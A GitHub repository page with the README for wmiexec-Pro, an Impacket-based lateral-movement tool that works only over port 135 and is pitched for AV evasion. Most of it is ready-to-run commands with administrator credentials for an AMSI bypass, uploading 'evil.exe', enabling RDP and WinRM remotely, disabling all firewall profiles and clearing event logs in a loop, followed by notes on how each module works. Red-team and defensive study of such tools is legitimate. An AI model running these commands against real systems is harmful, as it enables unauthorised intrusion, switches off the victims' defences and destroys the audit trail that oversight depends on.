Skip to content

svchost9913/wmiexec-Pro

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
images
images
 
 
lib
lib
 
 
README.md
README.md
 
 
wmiexec-pro.py
wmiexec-pro.py
 
 

Repository files navigation

wmiexec-Pro

New generation of wmiexec.py.

Table of Contents

  1. Info
  2. Features
  3. Getting Started
  4. Usage
  5. Screenshots
  6. How it works?
  7. References

Info

The new generation of wmiexec.py, more new features, whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement (Windows Defender, HuoRong, 360)

(back to top)

Features

  • Main feature: Only need port 135.
  • New module: AMSI bypass
  • New module: File transfer
  • New module: Remote enable RDP via wmi class method
  • New module: Windows firewall abusing
  • New module: Eventlog looping cleaning
  • New module: Remote enable WinRM without touching CMD
  • Enhancement: Get command execution output in new way
  • Enhancement: Execute vbs file

(back to top)

Getting Started

Installation

Only need latest version of Impacket

  1. Clone the impacket repository 
    git clone https://github.com/fortra/impacket
  2. Install imapcket 
    cd imapcket && sudo pip3 install .
  3. Enjoy it :) 
    git clone https://github.com/XiaoliChan/wmiexec-Pro

(back to top)

Usage

python3 wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h

Enable/disable amsi bypass:
   python3 wmiexec-pro.py administrator:[email protected] amsi -enable
   python3 wmiexec-pro.py administrator:[email protected] amsi -disable

Execute command:
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" (slient)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -with-output (with output)
   python3 wmiexec-pro.py administrator:[email protected] exec-command -command "whoami" -with-output -save (with output and save output to file)
   
Filetransfer:
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -upload -src-file "./evil.exe" -dest-file "C:\windows\temp\evil.exe" (Upload file over 512KB)
   python3 wmiexec-pro.py administrator:[email protected] filetransfer -download -src-file "C:\windows\temp\evil.exe" -dest-file "/tmp/evil.exe" (download file over 512KB)
   
RDP:
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable (Auto configure firewall)
   python3 wmiexec-pro.py administrator:[email protected] rdp -enable-ram (enable Restricted Admin Mode for PTH)
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable
   python3 wmiexec-pro.py administrator:[email protected] rdp -disable-ram (Disable Restricted Admin Mode)

WinRM:
   python3 wmiexec-pro.py administrator:[email protected] winrm -enable
   python3 wmiexec-pro.py administrator:[email protected] winrm -disable

Firewall:
   python3 wmiexec-pro.py administrator:[email protected] firewall -search-port 445
   python3 wmiexec-pro.py administrator:[email protected] firewall -dump (Dump all firewall rules)
   python3 wmiexec-pro.py administrator:[email protected] firewall -rule-id (ID from search port) -rule-op [enable/disable/remove] (enable, disable, remove specify rule)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile enable (Enable all firewall profiles)
   python3 wmiexec-pro.py administrator:[email protected] firewall -firewall-profile disable (disable all firewall profiles)
   
Eventlog:
   python3 wmiexec-pro.py administrator:[email protected] eventlog -risk-i-know (Looping cleaning eventlog)
   python3 wmiexec-pro.py administrator:[email protected] eventlog -retrive object-ID (Stop looping cleaning eventlog)

(back to top)

Screenshots

  • Help

  • exec-command

  • filetransfer

    • upload file

    • download file

(back to top)

How it works?

  • AMSI module:

    • Tal-Liberman's technique from blackhat asia 2018.

  • exec-command module:

    • Enhancement of previous project: wmiexec-RegOut, get output from wmi class instead of from registry.

  • filetransfer module:

    • For upload: encode the source file as base64 strings into the dropper named WriteFile.vbs, then create a new instance of object ActiveScriptEventConsumer to execute the dropper.
    • For download: remote create a class to store data, then execute the encoder LocalFileIntoClass.vbs to encode the file and store data into the class that just created.

  • rdp module:

    • For enable/disable: rdp serivces: control TerminalServices object directly.
    • For enable/disable: Restricted Admin Mode: control registry key DisableRestrictedAdmin via StdRegProv class.

  • winrm module:

    • For enable/disable: call Start/StopSerivce() method of Win32_Service.
    • For firewall rules: use module firewall.py to configure firewall of winrm.

  • firewall module:

    • Abusing MSFT_NetProtocolPortFilter, MSFT_NetFirewallRule, MSFT_NetFirewallProfile classes.

  • eventlog module:

    • Execute the vbs script file ClearEventlog.vbs without remove event and consumer.

  • execute-vbs module:

    • Picked from wmipersist.py.

  • classMethodEx method:

    • For create class: execute the vbs scritp : CreateClass.vbs to create simple class. (Why? Have no idea how to use PutClass method in impacket.)
    • For remove class: call DeleteClass method to remove class.

(back to top)

References

(back to top)

About

New generation of wmiexec.py

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 96.4%
  • VBScript 3.6%